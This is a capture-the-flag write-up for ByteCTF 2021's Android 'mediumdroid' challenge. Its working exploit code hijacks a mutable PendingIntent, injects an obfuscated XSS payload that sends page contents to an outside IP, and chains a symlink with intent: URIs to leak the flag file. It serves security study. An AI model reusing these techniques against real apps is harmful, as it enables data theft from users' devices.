
bytectf2021_mediumdroid

PendingIntent使用了空的Intent,因此我们可以在其他APP中劫持PendingIntent,任意修改Intent的action,实现广播

与easydroid的思路类似,我们利用PendingIntent发送com.bytectf.SET_FLAG的广播,目的是在flag文件中注入一段XSS,然后利用软链接建立一个symlink.html,并加载,实现将整个flag文件反弹
MainActivity.java

package com.bytectf.pwnmediumdroid;

import android.app.Activity;
import android.app.PendingIntent;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import android.widget.EditText;
public class MainActivity extends Activity {
    // Only assigned inside the commented-out lines of onCreate(); as the file
    // stands it stays null, so launch() would throw NullPointerException at
    // ed.setText(...) if it were ever called.
    EditText ed;

    /**
     * Entry point of the PoC app. Statement order matters: the symlink is
     * created first, then the background thread that waits for the hijacked
     * notification is started, and only then is the target app's
     * MainActivity launched with the attacker-controlled URL (see the page
     * text for how that URL is later turned into a notification).
     *
     * @param savedInstanceState passed straight through to the superclass
     */
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        /*ed = new EditText(this);
        setContentView(ed);
        launch("a");*/
        symlink();             // return value (the symlink path) is discarded
        HijackNotification();  // non-blocking: starts a thread and returns
        Intent i = new Intent();
        i.setClassName("com.bytectf.mediumdroid","com.bytectf.mediumdroid.MainActivity");
        i.setData(Uri.parse("http://www.ha1vktoutiao.com"));
        startActivity(i);
    }

    /**
     * Waits (on a background thread) until MagicService has captured the
     * target app's notification, then fills in that notification's
     * PendingIntent with an attacker-chosen Intent.
     *
     * Why this works (per the writeup): the target built its PendingIntent
     * from an empty base Intent, so PendingIntent.send(Context, int, Intent)
     * lets the caller supply the action, package and extras, and the
     * broadcast goes out with the target's identity. Defensive fix on the
     * target side: build the base Intent with an explicit component and use
     * PendingIntent.FLAG_IMMUTABLE so send() cannot fill anything in.
     */
    private void HijackNotification() {
        Thread t = new Thread(new Runnable() {
            @Override
            public void run() {
                // Busy-wait (10 ms poll) on the static written by MagicService.
                // NOTE(review): the interrupt is only logged and not restored,
                // so this loop cannot be cancelled by interrupting the thread.
                while (MagicService.sbn == null) {
                    try {
                        Thread.sleep(10);
                    } catch (InterruptedException e) {
                        e.printStackTrace();
                    }
                }
                runOnUiThread(new Runnable() {
                    @Override
                    public void run() {
                        // Take the PendingIntent from the captured notification.
                        PendingIntent pendingIntent = MagicService.sbn.getNotification().contentIntent;
                        // Intent that send() will merge into the (empty) base
                        // Intent: action, target package and a "flag" extra.
                        // The extra is the string the target writes into its
                        // flag file (per the writeup); that a third party can
                        // choose it at all is the mutable-PendingIntent bug.
                        Intent vunlnIntent = new Intent("com.bytectf.SET_FLAG");
                        vunlnIntent.setPackage("com.bytectf.mediumdroid");
                        vunlnIntent.putExtra("flag","x = '<img src=\"x\" onerror=\"eval(decodeURI(atob('bmV3JTIwSW1hZ2UoKS5zcmMlMjA9JTIwJTIyaHR0cDovLzE5Mi4zLjgxLjEwMi8/Y29va2llPSUyMiUyMCslMjB3aW5kb3cuYnRvYShlbmNvZGVVUkkoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJTIyaHRtbCUyMiklNUIwJTVELmlubmVySFRNTCkpOw==')))\">'");
                        Log.e("PendingIntent","okok");
                        try {
                            pendingIntent.send(MainActivity.this,0,vunlnIntent);
                            //sendBroadcast(vunlnIntent);
                            Log.e("PendingIntent","finish");
                        } catch (Exception e) {
                            // Failure is only logged; the stage-2 launch below
                            // still happens even if send() threw.
                            Log.e("PendingIntent",e.toString());
                            e.printStackTrace();
                        }
                        // Second launch of the target with the stage2 page URL.
                        Intent i = new Intent();
                        i.setClassName("com.bytectf.mediumdroid","com.bytectf.mediumdroid.MainActivity");
                        i.setData(Uri.parse("http://www.ha1vktoutiao.com/stage2.html"));
                        startActivity(i);
                    }
                });
            }
        });
        t.start();
    }

    /**
     * Creates {@code <dataDir>/symlink.html} pointing at the target app's
     * flag file and makes this app's data directory world-accessible.
     *
     * Each step is a shell command run through Runtime.exec(String); the
     * paths contain no whitespace, so the whitespace-splitting of that
     * overload is harmless here. The exit codes returned by waitFor() are
     * ignored, so a failed rm/ln/chmod goes unnoticed. The chmod presumably
     * exists so the target process can traverse this directory and follow
     * the link when it later loads the file:// URL — TODO confirm.
     *
     * @return the absolute path of the created symlink
     * @throws RuntimeException wrapping any IOException/InterruptedException
     *         from the exec/waitFor calls (cause is preserved)
     */
    private String symlink() {
        try {
            String root = getApplicationInfo().dataDir;
            String symlink = root + "/symlink.html";
            String flag = "/data/data/com.bytectf.mediumdroid/files/flag";
            Runtime.getRuntime().exec("rm " + symlink).waitFor();
            Runtime.getRuntime().exec("ln -s " + flag + " " + symlink).waitFor();
            Runtime.getRuntime().exec("chmod -R 777 " + root).waitFor();
            return symlink;
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }

    /**
     * Helper used during development (its only call site is commented out in
     * onCreate): builds the intent URI string for launching the target's
     * TestActivity with a "url" extra and shows it in the EditText.
     * The same flags (NEW_TASK | CLEAR_TASK) appear as launchFlags=0x10008000
     * in the intent: URIs of the served HTML pages.
     *
     * @param url unused; the extra is hard-coded to notify.html
     */
    private void launch(String url) {
        Intent extra = new Intent();
        extra.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TASK);
        extra.setClassName("com.bytectf.mediumdroid", "com.bytectf.mediumdroid.TestActivity");
        extra.putExtra("url","http://www.ha1vktoutiao.com/notify.html");
        String url_str = extra.toUri(Intent.URI_INTENT_SCHEME);
        ed.setText(url_str);  // NPE unless the commented-out init in onCreate runs
    }
}

MagicService.java

package com.bytectf.pwnmediumdroid;
import android.app.Notification;
import android.os.Bundle;
import android.service.notification.NotificationListenerService;
import android.service.notification.StatusBarNotification;
import android.util.Log;
public class MagicService extends NotificationListenerService {
    // Shared with MainActivity's polling thread. Not volatile, so the
    // cross-thread visibility of the write relies on JVM behaviour rather
    // than a guarantee; only the first matching notification is kept.
    public static StatusBarNotification sbn = null;

    /**
     * Captures the first posted notification whose title is "PWN" and whose
     * text is "ha1vk" (the values passed to jsi.Te3t in notify.html, per the
     * page). Everything else is ignored.
     *
     * Note: the parameter shadows the static field; {@code this.sbn} resolves
     * to the static field MagicService.sbn, not to the parameter.
     *
     * From a defender's view: this service only runs if the user grants it
     * notification access in system settings, and it can then read the
     * extras and PendingIntent of every app's notifications — which is why
     * a notification's PendingIntent must never be mutable with an empty
     * base Intent.
     *
     * @param sbn the notification just posted by any app
     */
    @Override
    public void onNotificationPosted(StatusBarNotification sbn) {
        if (this.sbn == null) {
            Bundle extras = sbn.getNotification().extras;
            // package name of the app that posted the notification (unused)
            String notificationPkg = sbn.getPackageName();
            // notification title
            String notificationTitle = extras.getString(Notification.EXTRA_TITLE);
            // notification body text
            String notificationText = extras.getString(Notification.EXTRA_TEXT);
            // both may be null for notifications without these extras
            if (notificationTitle != null && notificationText != null && notificationTitle.equals("PWN") && notificationText.equals("ha1vk")) {
                this.sbn = sbn;
                Log.i("NotificationMonitor", "Notification posted");
            }
        }
    }

    /**
     * Log-only; the captured static is intentionally not cleared here.
     *
     * @param sbn the notification that was removed
     */
    @Override
    public void onNotificationRemoved(StatusBarNotification sbn) {
        Log.i("NotificationMonitor","Notification removed");
    }
}

AndroidManifest.xml

<?xml version="1.0" encoding="utf-8"?>
<!-- Manifest of the PoC app (package com.bytectf.pwnmediumdroid). -->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.bytectf.pwnmediumdroid">
    <!-- Only permission requested; the served HTML pages are fetched over HTTP. -->
    <uses-permission android:name="android.permission.INTERNET" />
    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true">
        <!-- Launcher activity; exported so it can be started from the home screen. -->
        <activity
            android:name=".MainActivity"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <!-- Notification listener. The BIND_NOTIFICATION_LISTENER_SERVICE
             permission means only the system can bind to it, and it receives
             nothing until the user enables notification access for this app
             in system settings. -->
        <service android:name=".MagicService"
            android:label="@string/service_name"
            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
            <intent-filter>
                <action android:name="android.service.notification.NotificationListenerService" />
            </intent-filter>
        </service>
    </application>
</manifest>

服务器上的index.html

<!DOCTYPE html>
<!-- index.html: first page loaded by the target's MainActivity (see the
     http://www.ha1vktoutiao.com URL in the PoC's onCreate). After 5 s it
     navigates to an intent: URI that starts the target's TestActivity with a
     "url" extra pointing at notify.html. launchFlags=0x10008000 is
     FLAG_ACTIVITY_NEW_TASK | FLAG_ACTIVITY_CLEAR_TASK, the same pair set in
     MainActivity.launch(). That TestActivity loads whatever URL the extra
     names is inferred from the page, not visible here. -->
<html>
<head>
<meta charset="utf-8">
<title>PWN</title>
</head>
<body>
<script>
// Redirect via the intent: URI scheme (handled by the WebView/browser).
function getflag() {
    window.location = "intent:#Intent;launchFlags=0x10008000;component=com.bytectf.mediumdroid/.TestActivity;S.url=http%3A%2F%2Fwww.ha1vktoutiao.com%2Fnotify.html;end";
}
// String form of setTimeout is evaluated as code; setTimeout(getflag, 5000)
// would be the equivalent function-reference form.
setTimeout("getflag()",5000);
</script>
</body>
</html>

notify.html打开通知

<!DOCTYPE html>
<!-- notify.html: loaded inside the target's TestActivity. The single call
     below passes the title "PWN" and text "ha1vk" that MagicService matches
     on. "jsi" is presumably a JavaScript interface the target's WebView
     exposes to page content — confirm against the target app. Exposing
     such an interface to arbitrary (attacker-served) pages is what lets a
     remote page trigger app-side actions. -->
<html>
<head>
<meta charset="utf-8">
<title>NOTIFY</title>
</head>
<body>
<script>
jsi.Te3t("PWN","ha1vk");
</script>
</body>
</html>

stage2.html

<!DOCTYPE html>
<!-- stage2.html: loaded after the SET_FLAG broadcast has been sent (see the
     second startActivity in MainActivity.HijackNotification). After 10 s it
     starts the target's TestActivity with a file:// URL naming the
     symlink.html created by MainActivity.symlink(), which points at the
     target's own flag file. On the target side the root cause is an exported
     activity that loads an arbitrary "url" extra, file:// included;
     restricting the scheme (and WebSettings.setAllowFileAccess(false)) would
     close this step. -->
<html>
<head>
<meta charset="utf-8">
<title>STAGE2</title>
</head>
<body>
<script>
// Same intent: URI shape as index.html, different "url" extra.
function getflag() {
    window.location = "intent:#Intent;launchFlags=0x10008000;component=com.bytectf.mediumdroid/.TestActivity;S.url=file%3A%2F%2F%2Fdata%2Fuser%2F0%2Fcom.bytectf.pwnmediumdroid%2Fsymlink.html;end";
}
// Longer delay than index.html (10 s) so the broadcast has been handled first.
setTimeout("getflag()",10000);
</script>
</body>
</html>